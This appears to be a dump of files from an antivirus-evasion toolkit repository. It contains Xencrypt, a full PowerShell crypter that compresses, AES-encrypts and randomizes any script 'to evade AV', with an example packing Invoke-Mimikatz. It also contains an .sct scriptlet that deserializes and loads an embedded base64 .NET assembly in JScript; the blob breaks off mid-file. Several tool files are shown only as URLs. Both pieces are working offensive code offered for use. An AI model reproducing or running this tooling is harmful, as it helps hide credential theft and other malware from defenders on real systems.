2 | # Copyright (C) 2020 Xentropy ( @SamuelAnttila )
3 | #
4 | # This program is free software: you can redistribute it and/or modify
5 | # it under the terms of the GNU General Public License as published by
6 | # the Free Software Foundation, either version 3 of the License, or
7 | # (at your option) any later version.
8 | #
9 | # This program is distributed in the hope that it will be useful,
10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | # GNU General Public License for more details.
13 | #
14 | # You should have received a copy of the GNU General Public License
15 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
16 |
17 | Set-StrictMode -Version Latest
18 | $ErrorActionPreference = "Stop"
19 | $PSDefaultParameterValues['*:ErrorAction']='Stop'
20 |
21 | function Create-Var() {
22 | #Variable length help vary the length of the file generated
23 | #old: [guid]::NewGuid().ToString().Substring(24 + (Get-Random -Maximum 9))
24 | $set = "abcdefghijkmnopqrstuvwxyz"
25 | (1..(4 + (Get-Random -Maximum 6)) | %{ $set[(Get-Random -Minimum 0 -Maximum $set.Length)] } ) -join ''
26 | }
27 |
28 | function Invoke-Xencrypt {
29 | <#
30 | .SYNOPSIS
31 |
32 | Invoke-Xencrypt takes any PowerShell script as an input and both packs and encrypts it to evade AV. It also lets you layer this recursively however many times you want in order to foil dynamic & heuristic detection.
33 |
34 | .DESCRIPTION
35 |
36 | Invoke-Xencrypt takes any PowerShell script as an input and both packs and encrypts it to evade AV.
37 | The output script is highly randomized in order to make static analysis even more difficut.
38 | It also lets you layer this recursively however many times you want in order to attempt to foil dynamic & heuristic detection.
39 |
40 |
41 | .PARAMETER InFile
42 | Specifies the script to obfuscate/encrypt.
43 |
44 | .PARAMETER OutFile
45 | Specifies the output script.
46 |
47 | .PARAMETER Iterations
48 | The number of times the PowerShell script will be packed & crypted recursively. Default is 2.
49 |
50 | .EXAMPLE
51 |
52 | PS> Invoke-Xencrypt -InFile Invoke-Mimikatz.ps1 -OutFile banana.ps1 -Iterations 3
53 |
54 | .LINK
55 |
56 | https://github.com/the-xentropy/xencrypt
57 |
58 | #>
59 |
60 | [CmdletBinding()]
61 | Param (
62 | [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
63 | [string] $infile = $(Throw("-InFile is required")),
64 | [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
65 | [string] $outfile = $(Throw("-OutFile is required")),
66 | [Parameter(Mandatory=$false,ValueFromPipeline,ValueFromPipelineByPropertyName)]
67 | [string] $iterations = 2
68 | )
69 | Process {
70 | Write-Output "
71 | Xencrypt Copyright (C) 2020 Xentropy ( @SamuelAnttila )
72 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
73 | This is free software, and you are welcome to redistribute it
74 | under certain conditions.
75 | "
76 |
77 | # read
78 | Write-Output "[*] Reading '$($infile)' ..."
79 | $codebytes = [System.IO.File]::ReadAllBytes($infile)
80 |
81 |
82 | for ($i = 1; $i -le $iterations; $i++) {
83 | # Decide on encryption params ahead of time
84 |
85 | Write-Output "[*] Starting code layer ..."
86 | $paddingmodes = 'PKCS7','ISO10126','ANSIX923','Zeros'
87 | $paddingmode = $paddingmodes | Get-Random
88 | $ciphermodes = 'ECB','CBC'
89 | $ciphermode = $ciphermodes | Get-Random
90 |
91 | $keysizes = 128,192,256
92 | $keysize = $keysizes | Get-Random
93 |
94 | $compressiontypes = 'Gzip','Deflate'
95 | $compressiontype = $compressiontypes | Get-Random
96 |
97 | # compress
98 | Write-Output "[*] Compressing ..."
99 | [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
100 | if ($compressiontype -eq "Gzip") {
101 | $compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
102 | } elseif ( $compressiontype -eq "Deflate") {
103 | $compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress)
104 | }
105 | $compressionStream.Write( $codebytes, 0, $codebytes.Length )
106 | $compressionStream.Close()
107 | $output.Close()
108 | $compressedBytes = $output.ToArray()
109 |
110 | # generate key
111 | Write-Output "[*] Generating encryption key ..."
112 | $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
113 | if ($ciphermode -eq 'CBC') {
114 | $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
115 | } elseif ($ciphermode -eq 'ECB') {
116 | $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB
117 | }
118 |
119 | if ($paddingmode -eq 'PKCS7') {
120 | $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
121 | } elseif ($paddingmode -eq 'ISO10126') {
122 | $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ISO10126
123 | } elseif ($paddingmode -eq 'ANSIX923') {
124 | $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ANSIX923
125 | } elseif ($paddingmode -eq 'Zeros') {
126 | $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
127 | }
128 |
129 | $aesManaged.BlockSize = 128
130 | $aesManaged.KeySize = 256
131 | $aesManaged.GenerateKey()
132 | $b64key = [System.Convert]::ToBase64String($aesManaged.Key)
133 |
134 | # encrypt
135 | Write-Output "[*] Encrypting ..."
136 | $encryptor = $aesManaged.CreateEncryptor()
137 | $encryptedData = $encryptor.TransformFinalBlock($compressedBytes, 0, $compressedBytes.Length);
138 | [byte[]] $fullData = $aesManaged.IV + $encryptedData
139 | $aesManaged.Dispose()
140 | $b64encrypted = [System.Convert]::ToBase64String($fullData)
141 |
142 | # write
143 | Write-Output "[*] Finalizing code layer ..."
144 |
145 | # now, randomize the order of any statements that we can to further increase variation
146 |
147 | $stub_template = ''
148 |
149 | $code_alternatives = @()
150 | $code_alternatives += '${2} = [System.Convert]::FromBase64String("{0}")' + "`r`n"
151 | $code_alternatives += '${3} = [System.Convert]::FromBase64String("{1}")' + "`r`n"
152 | $code_alternatives += '${4} = New-Object "System.Security.Cryptography.AesManaged"' + "`r`n"
153 | $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
154 | $stub_template += $code_alternatives_shuffled -join ''
155 |
156 | $code_alternatives = @()
157 | $code_alternatives += '${4}.Mode = [System.Security.Cryptography.CipherMode]::'+$ciphermode + "`r`n"
158 | $code_alternatives += '${4}.Padding = [System.Security.Cryptography.PaddingMode]::'+$paddingmode + "`r`n"
159 | $code_alternatives += '${4}.BlockSize = 128' + "`r`n"
160 | $code_alternatives += '${4}.KeySize = '+$keysize + "`n" + '${4}.Key = ${3}' + "`r`n"
161 | $code_alternatives += '${4}.IV = ${2}[0..15]' + "`r`n"
162 | $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
163 | $stub_template += $code_alternatives_shuffled -join ''
164 |
165 | $code_alternatives = @()
166 | $code_alternatives += '${6} = New-Object System.IO.MemoryStream(,${4}.CreateDecryptor().TransformFinalBlock(${2},16,${2}.Length-16))' + "`r`n"
167 | $code_alternatives += '${7} = New-Object System.IO.MemoryStream' + "`r`n"
168 | $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
169 | $stub_template += $code_alternatives_shuffled -join ''
170 |
171 |
172 | if ($compressiontype -eq "Gzip") {
173 | $stub_template += '${5} = New-Object System.IO.Compression.GzipStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
174 | } elseif ( $compressiontype -eq "Deflate") {
175 | $stub_template += '${5} = New-Object System.IO.Compression.DeflateStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
176 | }
177 | $stub_template += '${5}.CopyTo(${7})' + "`r`n"
178 |
179 | $code_alternatives = @()
180 | $code_alternatives += '${5}.Close()' + "`r`n"
181 | $code_alternatives += '${4}.Dispose()' + "`r`n"
182 | $code_alternatives += '${6}.Close()' + "`r`n"
183 | $code_alternatives += '${8} = [System.Text.Encoding]::UTF8.GetString(${7}.ToArray())' + "`r`n"
184 | $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
185 | $stub_template += $code_alternatives_shuffled -join ''
186 |
187 | $stub_template += ('Invoke-Expression','IEX' | Get-Random)+'(${8})' + "`r`n"
188 |
189 |
190 | # it's ugly, but it beats concatenating each value manually.
191 | $code = $stub_template -f $b64encrypted, $b64key, (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var)
192 | $codebytes = [System.Text.Encoding]::UTF8.GetBytes($code)
193 | }
194 | Write-Output "[*] Writing '$($outfile)' ..."
195 | [System.IO.File]::WriteAllText($outfile,$code)
196 | Write-Output "[+] Done!"
197 | }
198 | }
199 |
--------------------------------------------------------------------------------
/tools/mingw-w64-install.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mingw-w64-install.exe
--------------------------------------------------------------------------------
/tools/msfvenom-zsh-completion.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/msfvenom-zsh-completion.tar.gz
--------------------------------------------------------------------------------
/tools/pe_to_shellcode.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/pe_to_shellcode.zip
--------------------------------------------------------------------------------
/tools/powersct.sct:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <package>
3 | <component
4 | id="dummy">
5 | <registration
6 | description="dummy"
7 | progid="dummy"
8 | version="1.00"
9 | remotable="True">
10 | <script
11 | language="JScript"><![CDATA[function setversion() {
12 | var shell = new ActiveXObject('WScript.Shell');
13 | ver = 'v4.0.30319';
14 | try {
15 | shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\');
16 | } catch(e) {
17 | ver = 'v2.0.50727';
18 | }
19 | shell.Environment('Process')('COMPLUS_Version') = ver;
20 |
21 | }
22 | function debug(s) {}
23 | function base64ToStream(b) {
24 | var enc = new ActiveXObject("System.Text.ASCIIEncoding");
25 | var length = enc.GetByteCount_2(b);
26 | var ba = enc.GetBytes_4(b);
27 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
28 | ba = transform.TransformFinalBlock(ba, 0, length);
29 | var ms = new ActiveXObject("System.IO.MemoryStream");
30 | ms.Write(ba, 0, (length / 4) * 3);
31 | ms.Position = 0;
32 | return ms;
33 | }
34 |
35 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
36 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
37 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
38 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
39 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
40 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
41 | "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
42 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
43 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
44 | "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
45 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
46 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
47 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
48 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
49 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
50 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
51 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
52 | "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
53 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
54 | "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
55 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
56 | "ZW1ibHkGFwAAAARMb2FkCg8MAAAAABgAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
57 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
58 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAs8cdWQAAAAAA"+
59 | "AAAA4AACAQsBMAAADgAAAAgAAAAAAAAuLQAAACAAAABAAAAAAEAAACAAAAACAAAEAAAAAAAAAAQA"+
60 | "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA3CwA"+
61 | "AE8AAAAAQAAArAUAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAKQrAAAcAAAAAAAAAAAAAAAAAAAA"+
62 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
63 | "AAAALnRleHQAAAA0DQAAACAAAAAOAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAArAUAAABA"+
64 | "AAAABgAAABAAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAWAAAAAAAAAAAA"+
65 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAABAtAAAAAAAASAAAAAIABQC4IQAA7AkAAAMAAAABAAAG"+
66 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIgAoAwAABiYq"+
67 | "PgIoDgAACgAAKAMAAAYmKgAAABswAgBSAAAAAQAAEQArSgAoCAAABiYSAB0oDwAACh/1KAYAAAYL"+
68 | "cgEAAHAoEAAACgAoEQAACgwACCgEAAAGKBIAAAoAAN4RDQAJbxMAAAooEgAACgAA3gAAFxMEK7EA"+
69 | "AAEQAAAAACsAEDsAERAAAAEbMAIAmgAAAAIAABEAKBQAAAoKBm8VAAAKAAZzFgAACgsGbxcAAAoM"+
70 | "CG8YAAAKAm8ZAAAKAAhvGAAACnILAABwbxoAAAoACG8bAAAKDQZvHAAACgBzHQAAChMEAAlvHgAA"+
71 | "ChMFKxURBW8fAAAKEwYAEQQRBm8gAAAKJgARBW8hAAAKLeLeDREFLAgRBW8iAAAKANwRBG8jAAAK"+
72 | "byQAAAoTBysAEQcqAAABEAAAAgBYACJ6AA0AAAAAEzACABUAAAADAAARACglAAAKCgYCbyYAAApv"+
73 | "JwAACiYqAAAAQlNKQgEAAQAAAAAADAAAAHYyLjAuNTA3MjcAAAAABQBsAAAAdAMAACN+AADgAwAA"+
74 | "cAQAACNTdHJpbmdzAAAAAFAIAAAkAAAAI1VTAHQIAAAQAAAAI0dVSUQAAACECAAAaAEAACNCbG9i"+
75 | "AAAAAAAAAAIAAAFXHQIcCQAAAAD6ATMAFgAAAQAAAB8AAAACAAAAAQAAAAgAAAAGAAAAJwAAAAEA"+
76 | "AAANAAAAAwAAAAIAAAACAAAAAwAAAAEAAAACAAAAAACAAgEAAAAAAAYA9QHJAwYAYgLJAwYAQgFj"+
77 | "Aw8A6QMAAAYAagEAAwYA2AEAAwYAuQEAAwYASQIAAwYAFQIAAwYALgIAAwYAgQEAAwYAVgGqAwYA"+
78 | "NAGqAwYAnAEAAwYAHATNAgYAJAPNAgoAdACDAwoAiQDjAgoAEAGDAwYAAQCWAgoAGgTjAgYALgNS"+
79 | "BAYADgA3AAoAwgLjAgYAXAPNAgYA7wDNAgoAXgSDAwoAEgODAwYAPAP9AwYAmADNAgYAjwLNAgAA"+
80 | "AAAlAAAAAAABAAEAAQAQABAEAAA9AAEAAQBRgMkAtgBQIAAAAACRAN4CuQABAFkgAAAAAIYYVgMG"+
81 | "AAIAbCAAAAAAlgAjBL8AAgDcIAAAAACWAFoAwwACAJQhAAAAAJYA4AAkAAMAAAAAAIAAkSCvAMgA"+
82 | "BAAAAAAAgACRILwAzQAFAAAAAACAAJEg6gC/AAcAAAABAPgDAAABAFYAAAABAEIEAAABAKQAAAAB"+
83 | "AKQAAAACANkACQBWAwEAEQBWAwYAGQBWAwoAKQBWAxAAMQBWAxAAOQBWAxAAQQBWAxAASQBWAxAA"+
84 | "UQBWAxAAWQBWAxAAYQBWAxUAaQBWAxAAcQBWAxAAeQBWAwYAyQBWAwEA0QAuASQA0QD3ACkA0QAA"+
85 | "ASQAgQB9AC0A2QBuAEsAiQDZAgYAkQBWA1AAiQAKAVYAmQB2A1sA4QA4BBAA4QBSABAAmQCRAGAA"+
86 | "iQAZAQYAsQBWAwYADABIA3AAFAAsBIAAsQBnAIUA6QBJBIsA8QAfAQYAeQCNAi0A+QDUAi0AwQAn"+
87 | "AZQAwQA4BJkAwQCRAGAACQAEALEALgALANMALgATANwALgAbAPsALgAjAAQBLgArABIBLgAzABIB"+
88 | "LgA7ABIBLgBDAAQBLgBLABgBLgBTABIBLgBbABIBLgBjADABLgBrAFoBGgAxAI8AtQIcAGkAeQAA"+
89 | "AQ0ArwABAAABDwC8AAEAAAERAOoAAgAEgAAAAQAAAAAAAAAAAAAAAAAjBAAAAgAAAAAAAAAAAAAA"+
90 | "nwAuAAAAAAABAAAAAAAAAAAAAACoAOMCAAAAAAAAAAAAQ29sbGVjdGlvbmAxAElFbnVtZXJhdG9y"+
91 | "YDEAa2VybmVsMzIAPE1vZHVsZT4AbXNjb3JsaWIAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMA"+
92 | "QWRkAGNtZABSdW5QU0NvbW1hbmQAQXBwZW5kAENyZWF0ZVJ1bnNwYWNlAGdldF9NZXNzYWdlAFJ1"+
93 | "bnNwYWNlSW52b2tlAElEaXNwb3NhYmxlAG5TdGRIYW5kbGUAR2V0U3RkSGFuZGxlAFNldFN0ZEhh"+
94 | "bmRsZQBTdGRPdXRwdXRIYW5kbGUAaGFuZGxlAFJ1blBTRmlsZQBBbGxvY0NvbnNvbGUAUmVhZExp"+
95 | "bmUAV3JpdGVMaW5lAENyZWF0ZVBpcGVsaW5lAENsb3NlAERpc3Bvc2UAQ3JlYXRlAFdyaXRlAEd1"+
96 | "aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2Vt"+
97 | "Ymx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxl"+
98 | "VmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlE"+
99 | "ZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2Vt"+
100 | "Ymx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNv"+
101 | "bXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAcG93ZXJzY3QuZXhl"+
102 | "AFRvU3RyaW5nAFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbABrZXJuZWwzMi5kbGwAUG93"+
103 | "ZXJTaGVsbABTeXN0ZW0AVHJpbQBPcGVuAE1haW4AU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlv"+
104 | "bgBTeXN0ZW0uUmVmbGVjdGlvbgBDb21tYW5kQ29sbGVjdGlvbgBFeGNlcHRpb24AU3RyaW5nQnVp"+
105 | "bGRlcgBJRW51bWVyYXRvcgBHZXRFbnVtZXJhdG9yAC5jdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25v"+
106 | "c3RpY3MAZ2V0X0NvbW1hbmRzAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2Vz"+
107 | "AFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNl"+
108 | "cnZpY2VzAERlYnVnZ2luZ01vZGVzAGFyZ3MAU3lzdGVtLkNvbGxlY3Rpb25zAFRlc3RDbGFzcwBQ"+
109 | "U09iamVjdABwb3dlcnNjdABnZXRfQ3VycmVudABBZGRTY3JpcHQAc2NyaXB0AE1vdmVOZXh0AFN5"+
110 | "c3RlbS5UZXh0AFJ1bnNwYWNlRmFjdG9yeQAAAAAJUABTACAAPgAAFU8AdQB0AC0AUwB0AHIAaQBu"+
111 | "AGcAAQAAABfFYPPntspHpLkoVG2NjN4ABCABAQgDIAABBSABARERBCABAQ4EIAEBAgkHBhgYDhJB"+
112 | "AgIEAAEBDgMAAA4DIAAOGQcIEkUSSRJNFRJRARJVElkVEl0BElUSVQ4EAAASRQUgAQESRQQgABJN"+
113 | "BCAAEnEIIAAVElEBElUGFRJRARJVCCAAFRJdARMABhUSXQESVQQgABMABSABElkcAyAAAgQHARJh"+
114 | "BAAAEmEFIAESYQ4It3pcVhk04IkIMb84Vq02TjUE9f///wIGCQUAAQEdDgMAAAIEAAEODgQAARgJ"+
115 | "BQACAQkYCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAcBAAAAAA0B"+
116 | "AAhwb3dlcnNjdAAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAxNwAAKQEAJDUxM2QwODYxLWRj"+
117 | "ZmYtNDUwNi04ZTEzLWFmNDMyOWZiMWQ4YQAADAEABzEuMC4wLjAAAAAAAAAAs8cdWQAAAAACAAAA"+
118 | "HAEAAMArAADADQAAUlNEUwz589HWFFROlbOenzlxcdkBAAAAQzpcVXNlcnNcSUVVc2VyXERvY3Vt"+
119 | "ZW50c1xWaXN1YWwgU3R1ZGlvIDIwMTVcUHJvamVjdHNccG93ZXJzY3RccG93ZXJzY3Rcb2JqXHg4"+
120 | "NlxEZWJ1Z1xwb3dlcnNjdC5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
121 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
122 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
123 | "AAAAAAAAAAAAAAAELQAAAAAAAAAAAAAeLQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEC0AAAAA"+
124 | "AAAAAAAAAABfQ29yRXhlTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIEAAAAAAAAAAAAAAAAAAAAAA"+
125 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
126 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
127 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
128 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAAgAACAGAAAAFAAAIAAAAAAAAAA"+
129 | "AAAAAAAAAAEAAQAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEA"+
130 | "AQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAKwDAACQQAAAHAMAAAAAAAAAAAAAHAM0AAAAVgBT"+
131 | "AF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8A"+
132 | "AAAAAAAABAAAAAEAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAA"+
133 | "ACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBHwCAAABAFMAdAByAGkAbgBnAEYA"+
134 | "aQBsAGUASQBuAGYAbwAAAFgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBu"+
135 | "AHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAAA6AAkAAQBGAGkA"+
136 | "bABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAcABvAHcAZQByAHMAYwB0AAAAAAAwAAgAAQBG"+
137 | "AGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA6AA0AAQBJAG4AdABlAHIA"+
138 | "bgBhAGwATgBhAG0AZQAAAHAAbwB3AGUAcgBzAGMAdAAuAGUAeABlAAAAAABIABIAAQBMAGUAZwBh"+
139 | "AGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAxADcA"+
140 | "AAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEIADQABAE8AcgBp"+
141 | "AGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABwAG8AdwBlAHIAcwBjAHQALgBlAHgAZQAAAAAA"+
142 | "MgAJAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABwAG8AdwBlAHIAcwBjAHQAAAAAADQACAAB"+
143 | "AFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMA"+
144 | "cwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAALxDAADqAQAAAAAA"+
145 | "AAAAAADvu788P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCIgc3RhbmRhbG9uZT0i"+
146 | "eWVzIj8+DQoNCjxhc3NlbWJseSB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20u"+
147 | "djEiIG1hbmlmZXN0VmVyc2lvbj0iMS4wIj4NCiAgPGFzc2VtYmx5SWRlbnRpdHkgdmVyc2lvbj0i"+
148 | "MS4wLjAuMCIgbmFtZT0iTXlBcHBsaWNhdGlvbi5hcHAiLz4NCiAgPHRydXN0SW5mbyB4bWxucz0i"+
149 | "dXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjIiPg0KICAgIDxzZWN1cml0eT4NCiAgICAg"+
150 | "IDxyZXF1ZXN0ZWRQcml2aWxlZ2VzIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFz"+
151 | "bS52MyI+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBsZXZlbD0iYXNJbnZva2Vy"+
152 | "IiB1aUFjY2Vzcz0iZmFsc2UiLz4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8"+
153 | "L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCjwvYXNzZW1ibHk+AAAAAAAAAAAAAAAAAAAAAAAA"+
154 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
